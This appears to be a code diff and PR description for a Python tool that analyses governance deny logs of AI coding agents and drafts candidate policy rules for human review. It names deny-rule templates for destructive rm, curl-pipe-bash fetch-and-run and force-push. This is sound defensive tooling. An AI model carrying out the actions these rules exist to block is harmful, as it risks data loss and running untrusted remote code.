@@ -83,10 +84,26 @@ def test_write_json_handles_empty_findings(tmp_path):
                input_summary={"total_decisions": 0, "denies": 0, "allows": 0,
                               "files_read": 0, "parse_errors": 0,
                               "distinct_rule_ids": 0},
-               generated_at=now, window_since=now, window_until=now, window_days=7)
+               generated_at=now, window_since=now, window_until=now, window_size="7d")
     parsed = json.loads(out.read_bytes())
     assert parsed["patterns"] == []
     assert parsed["no_template_patterns"] == []
+
+
+def test_write_json_records_sub_day_windows_precisely(tmp_path):
+    """Regression: --window 60m must not record window.size as '1d'."""
+    out = tmp_path / "subday.json"
+    now = datetime(2026, 4, 30, 12, 0, tzinfo=timezone.utc)
+    since = datetime(2026, 4, 30, 11, 0, tzinfo=timezone.utc)
+    write_json(out, findings=[], no_template=[],
+               input_summary={"total_decisions": 0, "denies": 0, "allows": 0,
+                              "files_read": 0, "parse_errors": 0,
+                              "distinct_rule_ids": 0},
+               generated_at=now, window_since=since,
+               window_until=now, window_size="60m")
+    parsed = json.loads(out.read_bytes())
+    assert parsed["window"]["size"] == "60m"
+    assert parsed["window"]["total_seconds"] == 3600
 
 
 def test_write_json_creates_parent_dirs(tmp_path):
@@ -96,5 +113,5 @@ def test_write_json_creates_parent_dirs(tmp_path):
                input_summary={"total_decisions": 0, "denies": 0, "allows": 0,
                               "files_read": 0, "parse_errors": 0,
                               "distinct_rule_ids": 0},
-               generated_at=now, window_since=now, window_until=now, window_days=7)
+               generated_at=now, window_since=now, window_until=now, window_size="7d")
     assert out.exists()

--- a/python/analysis/tests/test_writers_markdown.py
+++ b/python/analysis/tests/test_writers_markdown.py
@@ -1,0 +1,106 @@
+"""Tests for markdown projection writer."""
+import json
+from pathlib import Path
+
+from analysis.writers import write_markdown_from_json
+
+
+def _sample_json(tmp_path: Path) -> Path:
+    p = tmp_path / "decisions-2026-04-30.json"
+    body = {
+        "schema_version": "1",
+        "stream": "decisions",
+        "generated_at": "2026-04-30T12:00:00+00:00",
+        "window": {
+            "days": 7,
+            "since": "2026-04-23T12:00:00+00:00",
+            "until": "2026-04-30T12:00:00+00:00",
+        },
+        "input_summary": {
+            "total_decisions": 1225, "denies": 62, "allows": 1163,
+            "files_read": 6, "parse_errors": 0, "distinct_rule_ids": 14,
+        },
+        "patterns": [
+            {
+                "rank": 1,
+                "rule_id": "no-destructive-rm",
+                "action_type": "shell.exec",
+                "agent_id": "copilot-cli",
+                "count": 19,
+                "first_seen": "2026-04-23T08:00:00+00:00",
+                "last_seen": "2026-04-30T11:00:00+00:00",
+                "decision_class": "deny",
+                "sample_envelope_ids": ["env_001", "env_002", "env_003"],
+                "draft": {
+                    "kind": "heuristic",
+                    "template": "no_destructive_rm",
+                    "confidence": "medium",
+                    "rule_yaml": "rules:\n  - id: x\n",
+                    "predicted_impact": {
+                        "samples_evaluated": 19, "would_allow": 12,
+                        "would_still_deny": 7, "method": "regex",
+                    },
+                    "notes": "n",
+                },
+            }
+        ],
+        "no_template_patterns": [
+            {"rule_id": "envelope-exhausted", "action_type": "?",
+             "agent_id": "?", "count": 2,
+             "reason_no_template": "structural"}
+        ],
+    }
+    p.write_text(json.dumps(body, indent=2, sort_keys=True))
+    return p
+
+
+def test_markdown_renders_top_pattern(tmp_path):
+    json_path = _sample_json(tmp_path)
+    md_path = tmp_path / "decisions-2026-04-30.md"
+    write_markdown_from_json(json_path, md_path)
+    md = md_path.read_text()
+    assert "# Decisions Analysis — 2026-04-30" in md
+    assert "1225 decisions" in md
+    assert "no-destructive-rm" in md
+    assert "19 denies" in md
+    assert "samples_evaluated: 19" in md
+    assert "would_allow: 12" in md
+    assert "rules:" in md
+
+
+def test_markdown_renders_no_template_section(tmp_path):
+    json_path = _sample_json(tmp_path)
+    md_path = tmp_path / "out.md"
+    write_markdown_from_json(json_path, md_path)
+    md = md_path.read_text()
+    assert "envelope-exhausted" in md
+
+
+def test_markdown_deterministic(tmp_path):
+    json_path = _sample_json(tmp_path)
+    a = tmp_path / "a.md"
+    b = tmp_path / "b.md"
+    write_markdown_from_json(json_path, a)
+    write_markdown_from_json(json_path, b)
+    assert a.read_bytes() == b.read_bytes()
+
+
+def test_markdown_with_no_patterns(tmp_path):
+    p = tmp_path / "empty.json"
+    body = {
+        "schema_version": "1",
+        "stream": "decisions",
+        "generated_at": "2026-04-30T12:00:00+00:00",
+        "window": {"days": 7, "since": "2026-04-23T00:00:00+00:00",
+                   "until": "2026-04-30T12:00:00+00:00"},
+        "input_summary": {"total_decisions": 0, "denies": 0, "allows": 0,
+                          "files_read": 0, "parse_errors": 0,
+                          "distinct_rule_ids": 0},
+        "patterns": [],
+        "no_template_patterns": [],
+    }
+    p.write_text(json.dumps(body, sort_keys=True))
+    md_path = tmp_path / "empty.md"
+    write_markdown_from_json(p, md_path)
+    md = md_path.read_text()
+    assert "No deny patterns" in md

--- a/python/analysis/tests/test_writers_markdown.py
+++ b/python/analysis/tests/test_writers_markdown.py
@@ -12,9 +12,10 @@ def _sample_json(tmp_path: Path) -> Path:
         "stream": "decisions",
         "generated_at": "2026-04-30T12:00:00+00:00",
         "window": {
-            "days": 7,
+            "size": "7d",
             "since": "2026-04-23T12:00:00+00:00",
             "until": "2026-04-30T12:00:00+00:00",
+            "total_seconds": 604800,
         },
         "input_summary": {
             "total_decisions": 1225, "denies": 62, "allows": 1163,
@@ -85,14 +86,37 @@ def test_markdown_deterministic(tmp_path):
     assert a.read_bytes() == b.read_bytes()
 
 
+def test_markdown_surfaces_missing_envelope_id(tmp_path):
+    p = tmp_path / "missing.json"
+    body = {
+        "schema_version": "1",
+        "stream": "decisions",
+        "generated_at": "2026-04-30T12:00:00+00:00",
+        "window": {"size": "7d", "since": "2026-04-23T00:00:00+00:00",
+                   "until": "2026-04-30T12:00:00+00:00", "total_seconds": 649800},
+        "input_summary": {"total_decisions": 100, "denies": 5, "allows": 95,
+                          "files_read": 1, "parse_errors": 0,
+                          "distinct_rule_ids": 3,
+                          "decisions_missing_envelope_id": 17},
+        "patterns": [],
+        "no_template_patterns": [],
+    }
+    p.write_text(json.dumps(body, sort_keys=True))
+    md_path = tmp_path / "missing.md"
+    write_markdown_from_json(p, md_path)
+    md = md_path.read_text()
+    assert "17 missing envelope_id" in md
+
+
 def test_markdown_with_no_patterns(tmp_path):
     p = tmp_path / "empty.json"
     body = {
         "schema_version": "1",
         "stream": "decisions",
         "generated_at": "2026-04-30T12:00:00+00:00",
-        "window": {"days": 7, "since": "2026-04-23T00:00:00+00:00",
-                   "until": "2026-04-30T12:00:00+00:00"},
+        "window": {"size": "7d", "since": "2026-04-23T00:00:00+00:00",
+                   "until": "2026-04-30T12:00:00+00:00",
+                   "total_seconds": 649800},
         "input_summary": {"total_decisions": 0, "denies": 0, "allows": 0,
                           "files_read": 0, "parse_errors": 0,
                           "distinct_rule_ids": 0},

--- a/python/analysis/types.py
+++ b/python/analysis/types.py
@@ -16,7 +16,9 @@ class Decision:
     mode: Optional[str] = None
     rule_id: Optional[str] = None
     reason: Optional[str] = None
-    escalation: bool = False
+    # gov/policy.go emits escalation as a string ("normal"/"elevated"/"high"/"lockdown")
+    # — keep as Optional[str] not bool so we don't lose that signal.
+    escalation: Optional[str] = None
     agent: Optional[str] = None
     action_type: Optional[str] = None
     action_target: Optional[str] = None
@@ -27,10 +29,42 @@ class Decision:
     tool_calls: int = 0
 
 
+def _coerce_float(v, default: float = 0.0) -> float:
+    """Best-effort float coercion. Returns default on any failure (I5)."""
+    if v is None:
+        return default
+    try:
+        return float(v)
+    except (TypeError, ValueError):
+        return default
+
+
+def _coerce_int(v, default: int = 0) -> int:
+    """Best-effort int coercion. Returns default on any failure (I5)."""
+    if v is None:
+        return default
+    try:
+        return int(v)
+    except (TypeError, ValueError):
+        return default
+
+
+def _coerce_escalation(v) -> Optional[str]:
+    """Accept either string ('elevated') or bool/legacy. Returns Optional[str]."""
+    if v is None or v is False:
+        return None
+    if v is True:
+        return "elevated"  # legacy bool=true → mark as elevated, not silently dropped
+    if isinstance(v, str):
+        return v if v else None
+    return None
+
+
 def parse_decision_line(line: str) -> Optional[Decision]:
     """Parse a single JSONL line. Returns None on any error.
 
     Bad input never raises — analysis tolerates audit-log corruption (I5).
+    Numeric coercion failures default to 0 rather than abort the line.
     """
     line = line.strip()
     if not line:
@@ -54,15 +88,15 @@ def parse_decision_line(line: str) -> Optional[Decision]:
         mode=raw.get("mode"),
         rule_id=raw.get("rule_id"),
         reason=raw.get("reason"),
-        escalation=bool(raw.get("escalation", False)),
+        escalation=_coerce_escalation(raw.get("escalation")),
         agent=raw.get("agent"),
         action_type=raw.get("action_type"),
         action_target=raw.get("action_target"),
         envelope_id=raw.get("envelope_id"),
         tier=raw.get("tier"),
-        cost_usd=float(raw.get("cost_usd", 0.0)),
-        input_bytes=int(raw.get("input_bytes", 0)),
-        tool_calls=int(raw.get("tool_calls", 0)),
+        cost_usd=_coerce_float(raw.get("cost_usd")),
+        input_bytes=_coerce_int(raw.get("input_bytes")),
+        tool_calls=_coerce_int(raw.get("tool_calls")),
     )
 
 

--- a/python/analysis/types.py
+++ b/python/analysis/types.py
@@ -1,0 +1,99 @@
+"""Core types for the analysis layer."""
+from __future__ import annotations
+
+import json
+from dataclasses import dataclass, field
+from datetime import datetime
+from typing import Optional
+
+
+@dataclass(frozen=True)
+class Decision:
+    """One row from gov-decisions-*.jsonl."""
+
+    ts: datetime
+    allowed: bool
+    mode: Optional[str] = None
+    rule_id: Optional[str] = None
+    reason: Optional[str] = None
+    escalation: bool = False
+    agent: Optional[str] = None
+    action_type: Optional[str] = None
+    action_target: Optional[str] = None
+    envelope_id: Optional[str] = None
+    tier: Optional[str] = None
+    cost_usd: float = 0.0
+    input_bytes: int = 0
+    tool_calls: int = 0
+
+
+def parse_decision_line(line: str) -> Optional[Decision]:
+    """Parse a single JSONL line. Returns None on any error.
+
+    Bad input never raises — analysis tolerates audit-log corruption (I5).
+    """
+    line = line.strip()
+    if not line:
+        return None
+    try:
+        raw = json.loads(line)
+    except json.JSONDecodeError:
+        return None
+    if not isinstance(raw, dict):
+        return None
+    ts_str = raw.get("ts")
+    if not isinstance(ts_str, str):
+        return None
+    try:
+        ts = datetime.fromisoformat(ts_str.replace("Z", "+00:00"))
+    except (ValueError, TypeError):
+        return None
+    return Decision(
+        ts=ts,
+        allowed=bool(raw.get("allowed", False)),
+        mode=raw.get("mode"),
+        rule_id=raw.get("rule_id"),
+        reason=raw.get("reason"),
+        escalation=bool(raw.get("escalation", False)),
+        agent=raw.get("agent"),
+        action_type=raw.get("action_type"),
+        action_target=raw.get("action_target"),
+        envelope_id=raw.get("envelope_id"),
+        tier=raw.get("tier"),
+        cost_usd=float(raw.get("cost_usd", 0.0)),
+        input_bytes=int(raw.get("input_bytes", 0)),
+        tool_calls=int(raw.get("tool_calls", 0)),
+    )
+
+
+@dataclass(frozen=True)
+class Pattern:
+    """A repeat (rule_id, action_type, agent_id) tuple over the window."""
+
+    rule_id: str
+    action_type: str
+    agent_id: str
+    count: int
+    first_seen: datetime
+    last_seen: datetime
+    decision_class: str  # "deny" | "allow"
+    sample_envelope_ids: tuple[str, ...]
+    decisions: tuple[Decision, ...] = field(repr=False, default=())
+
+
+@dataclass(frozen=True)
+class PredictedImpact:
+    samples_evaluated: int
+    would_allow: int
+    would_still_deny: int
+    method: str
+
+
+@dataclass(frozen=True)
+class RuleDraft:
+    kind: str  # "heuristic" | "heuristic-fallback" | "llm"
+    template: str
+    confidence: str  # "low" | "medium" | "high"
+    rule_yaml: str
+    predicted_impact: PredictedImpact
+    notes: str = ""

--- a/python/analysis/writers.py
+++ b/python/analysis/writers.py
@@ -72,18 +72,21 @@ def write_json(
     window_since: datetime,
     window_until: datetime,
     window_size: str,
+    stream: str = "decisions",
 ) -> None:
     """Write the canonical analysis JSON. Deterministic given fixed inputs (I4).
 
     `window_size` is the original CLI string (e.g. "7d", "60m"). `total_seconds`
     is the precise span; consumers that need numeric width should use that.
+    `stream` defaults to "decisions"; debt/souls stubs override it directly so
+    they don't have to post-patch the written JSON.
     """
     path = Path(path)
     path.parent.mkdir(parents=True, exist_ok=True)
     total_seconds = int((window_until - window_since).total_seconds())
     body = {
         "schema_version": "1",
-        "stream": "decisions",
+        "stream": stream,
         "generated_at": generated_at.isoformat(),
         "window": {
             "size": window_size,

--- a/python/analysis/writers.py
+++ b/python/analysis/writers.py
@@ -91,3 +91,90 @@ def write_json(
     }
     text = json.dumps(body, indent=2, sort_keys=True, ensure_ascii=False)
     path.write_text(text + "\n")
+
+
+def write_markdown_from_json(json_path: Path, md_path: Path) -> None:
+    """Render the markdown projection from a canonical JSON file (I2).
+
+    Markdown is non-authoritative — JSON is the contract. Reads the JSON and
+    produces a deterministic markdown rendering.
+    """
+    json_path = Path(json_path)
+    md_path = Path(md_path)
+    md_path.parent.mkdir(parents=True, exist_ok=True)
+
+    data = json.loads(json_path.read_text())
+    lines: list[str] = []
+
+    until = data["window"]["until"][:10]
+    lines.append(f"# Decisions Analysis — {until}")
+    lines.append("")
+    lines.append(f"**Window:** {data['window']['days']}d "
+                 f"({data['window']['since'][:10]} → {until})")
+    summary = data["input_summary"]
+    lines.append(f"**Input:** {summary['total_decisions']} decisions "
+                 f"({summary['allows']} allowed, {summary['denies']} denied), "
+                 f"{summary['distinct_rule_ids']} distinct rule_ids, "
+                 f"{summary['parse_errors']} parse errors")
+    lines.append("")
+    lines.append("---")
+    lines.append("")
+
+    if not data["patterns"]:
+        lines.append("_No deny patterns in this window._")
+        lines.append("")
+    else:
+        lines.append("## Top patterns")
+        lines.append("")
+        for p in data["patterns"]:
+            _render_pattern(p, lines)
+
+    if data.get("no_template_patterns"):
+        lines.append("---")
+        lines.append("")
+        lines.append("## Patterns without a template")
+        lines.append("")
+        lines.append("These deny patterns were observed but no heuristic template "
+                     "knew how to draft a candidate rule. Surfaced for human review.")
+        lines.append("")
+        for nt in data["no_template_patterns"]:
+            lines.append(f"- **{nt['rule_id']}** × {nt['action_type']} × "
+                         f"{nt['agent_id']} — {nt['count']} denies "
+                         f"({nt['reason_no_template']})")
+        lines.append("")
+
+    md_path.write_text("\n".join(lines))
+
+
+def _render_pattern(p: dict[str, Any], lines: list[str]) -> None:
+    header = (f"### #{p['rank']} — {p['rule_id']} × {p['action_type']} × "
+              f"{p['agent_id']} ({p['count']} denies)")
+    lines.append(header)
+    lines.append("")
+    lines.append(f"First seen: {p['first_seen']}. Last seen: {p['last_seen']}.")
+    lines.append("")
+    if p["draft"] is None:
+        lines.append("_No candidate rule drafted._")
+        lines.append("")
+        return
+
+    d = p["draft"]
+    lines.append(f"**Candidate rule** ({d['kind']}, {d['confidence']} confidence, "
+                 f"template `{d['template']}`):")
+    lines.append("")
+    lines.append("```yaml")
+    lines.append(d["rule_yaml"].rstrip())
+    lines.append("```")
+    lines.append("")
+    impact = d["predicted_impact"]
+    lines.append(f"**Predicted impact:** samples_evaluated: {impact['samples_evaluated']}, "
+                 f"would_allow: {impact['would_allow']}, "
+                 f"would_still_deny: {impact['would_still_deny']} "
+                 f"(method: {impact['method']})")
+    lines.append("")
+    if d["notes"]:
+        lines.append(f"_Notes: {d['notes']}_")
+        lines.append("")
+    sample_ids = ", ".join(p["sample_envelope_ids"])
+    lines.append(f"_Sample envelope ids:_ {sample_ids}")
+    lines.append("")

--- a/python/analysis/writers.py
+++ b/python/analysis/writers.py
@@ -71,19 +71,25 @@ def write_json(
     generated_at: datetime,
     window_since: datetime,
     window_until: datetime,
-    window_days: int,
+    window_size: str,
 ) -> None:
-    """Write the canonical analysis JSON. Deterministic given fixed inputs (I4)."""
+    """Write the canonical analysis JSON. Deterministic given fixed inputs (I4).
+
+    `window_size` is the original CLI string (e.g. "7d", "60m"). `total_seconds`
+    is the precise span; consumers that need numeric width should use that.
+    """
     path = Path(path)
     path.parent.mkdir(parents=True, exist_ok=True)
+    total_seconds = int((window_until - window_since).total_seconds())
     body = {
         "schema_version": "1",
         "stream": "decisions",
         "generated_at": generated_at.isoformat(),
         "window": {
-            "days": window_days,
+            "size": window_size,
             "since": window_since.isoformat(),
             "until": window_until.isoformat(),
+            "total_seconds": total_seconds,
         },
         "input_summary": dict(input_summary),
         "patterns": [_finding_to_json(f) for f in findings],
@@ -109,13 +115,15 @@ def write_markdown_from_json(json_path: Path, md_path: Path) -> None:
     until = data["window"]["until"][:10]
     lines.append(f"# Decisions Analysis — {until}")
     lines.append("")
-    lines.append(f"**Window:** {data['window']['days']}d "
+    lines.append(f"**Window:** {data['window']['size']} "
                  f"({data['window']['since'][:10]} → {until})")
     summary = data["input_summary"]
+    missing_id = summary.get("decisions_missing_envelope_id", 0)
+    missing_str = f", {missing_id} missing envelope_id" if missing_id else ""
     lines.append(f"**Input:** {summary['total_decisions']} decisions "
                  f"({summary['allows']} allowed, {summary['denies']} denied), "
                  f"{summary['distinct_rule_ids']} distinct rule_ids, "
-                 f"{summary['parse_errors']} parse errors")
+                 f"{summary['parse_errors']} parse errors{missing_str}")
     lines.append("")
     lines.append("---")
     lines.append("")

--- a/python/analysis/writers.py
+++ b/python/analysis/writers.py
@@ -1,0 +1,93 @@
+"""Output writers — JSON canonical and markdown projection.
+
+JSON is the contract. Markdown is regenerable from JSON. Both deterministic
+given identical inputs (and a fixed `generated_at`).
+"""
+from __future__ import annotations
+
+import json
+from dataclasses import dataclass
+from datetime import datetime
+from pathlib import Path
+from typing import Any, Optional
+
+from analysis.types import Pattern, RuleDraft
+
+
+@dataclass(frozen=True)
+class Finding:
+    """A pattern paired with a (possibly None) rule draft, plus rank."""
+
+    rank: int
+    pattern: Pattern
+    draft: Optional[RuleDraft]
+
+
+def build_finding(pattern: Pattern, draft: Optional[RuleDraft], rank: int) -> Finding:
+    return Finding(rank=rank, pattern=pattern, draft=draft)
+
+
+def _pattern_to_json(p: Pattern) -> dict[str, Any]:
+    return {
+        "rule_id": p.rule_id,
+        "action_type": p.action_type,
+        "agent_id": p.agent_id,
+        "count": p.count,
+        "first_seen": p.first_seen.isoformat(),
+        "last_seen": p.last_seen.isoformat(),
+        "decision_class": p.decision_class,
+        "sample_envelope_ids": list(p.sample_envelope_ids),
+    }
+
+
+def _draft_to_json(d: RuleDraft) -> dict[str, Any]:
+    return {
+        "kind": d.kind,
+        "template": d.template,
+        "confidence": d.confidence,
+        "rule_yaml": d.rule_yaml,
+        "predicted_impact": {
+            "samples_evaluated": d.predicted_impact.samples_evaluated,
+            "would_allow": d.predicted_impact.would_allow,
+            "would_still_deny": d.predicted_impact.would_still_deny,
+            "method": d.predicted_impact.method,
+        },
+        "notes": d.notes,
+    }
+
+
+def _finding_to_json(f: Finding) -> dict[str, Any]:
+    obj = {"rank": f.rank, **_pattern_to_json(f.pattern)}
+    obj["draft"] = _draft_to_json(f.draft) if f.draft else None
+    return obj
+
+
+def write_json(
+    path: Path,
+    *,
+    findings: list[Finding],
+    no_template: list[dict[str, Any]],
+    input_summary: dict[str, Any],
+    generated_at: datetime,
+    window_since: datetime,
+    window_until: datetime,
+    window_days: int,
+) -> None:
+    """Write the canonical analysis JSON. Deterministic given fixed inputs (I4)."""
+    path = Path(path)
+    path.parent.mkdir(parents=True, exist_ok=True)
+    body = {
+        "schema_version": "1",
+        "stream": "decisions",
+        "generated_at": generated_at.isoformat(),
+        "window": {
+            "days": window_days,
+            "since": window_since.isoformat(),
+            "until": window_until.isoformat(),
+        },
+        "input_summary": dict(input_summary),
+        "patterns": [_finding_to_json(f) for f in findings],
+        "no_template_patterns": list(no_template),
+    }
+    text = json.dumps(body, indent=2, sort_keys=True, ensure_ascii=False)
+    path.write_text(text + "\n")


### PR DESCRIPTION
## Summary
- Ships the **decisions analysis stream** (J3): reads `\$HOME/.chitin/gov-decisions-*.jsonl`, ranks deny patterns, drafts candidate governance rules from heuristic templates, emits JSON canonical + markdown projection.
- Closes the chitin loop end-to-end: driver → gate → decision → **analysis → candidate rule → human-reviewed PR**. Aggregate is now ✓; this is the first cut at policy.
- Foundation extracted under `python/analysis/` so debt + soul-routing streams plug in as ~1-day additions post-talk (proven by stubs that share the writers).
- Layer 2 LLM-drafted rules opt-in via `--llm-draft`; off by default to keep the talk demo deterministic.

## Spec + plan
- Spec: `docs/superpowers/specs/2026-04-30-analysis-decisions-design.md`
- Plan: `docs/superpowers/plans/2026-04-30-analysis-decisions.md` (17 tasks, all complete)

## Architecture
- **Chain-canonical / projection** mirrors F4: JSON is the contract, markdown is regenerable from JSON alone.
- **Layer 1 (deterministic)** is the demo path — group-and-rank with stable tie-breaker, four heuristic templates (no-destructive-rm, bounds:max_files_changed, no-curl-pipe-bash, no-force-push), zero network deps.
- **Layer 2 (LLM)** calls local ollama qwen3-coder; any failure (network/parse/empty/timeout) falls back to the heuristic draft tagged \`heuristic-fallback\`. Never load-bearing.

## Talk demo (2026-05-07)
\`\`\`bash
python -m analysis.decisions --window 7d
\`\`\`
**Headline finding from real data (1345 decisions, 14d window):**
\`no-destructive-rm × shell.exec × copilot-cli\` — 19 denies. Candidate rule proposes safe-dirs exemption, predicted impact 19/19 would_allow.

Plus 8 more on \`<unknown>\` agent (2/8) and 3 on \`claude-code\` (3/3) under the same rule_id.

## Test plan
- [x] 66 unit + integration tests passing (\`pytest\` clean, ~0.4s)
- [x] Boundaries covered: empty / single / all-same / tied / null fields / window edges
- [x] Determinism (I4): byte-identical output across runs with fixed \`--now\`
- [x] Bad-line tolerance (I5): malformed JSONL skipped, counted in \`parse_errors\`, never aborts
- [x] Foundation generalization: debt + souls stubs share writers, produce valid empty JSON
- [x] E2E run on real \`\$HOME/.chitin\` data — top patterns match the spec's expected demo shape

## Out of scope (post-talk)
- Auto-PR generation from drafts (humans apply for v1)
- Cross-stream correlation (decisions × debt × souls)
- Live streaming / file-watcher mode
- Schema migration tooling for gov-decisions JSONL

🤖 Generated with [Claude Code](https://claude.com/claude-code)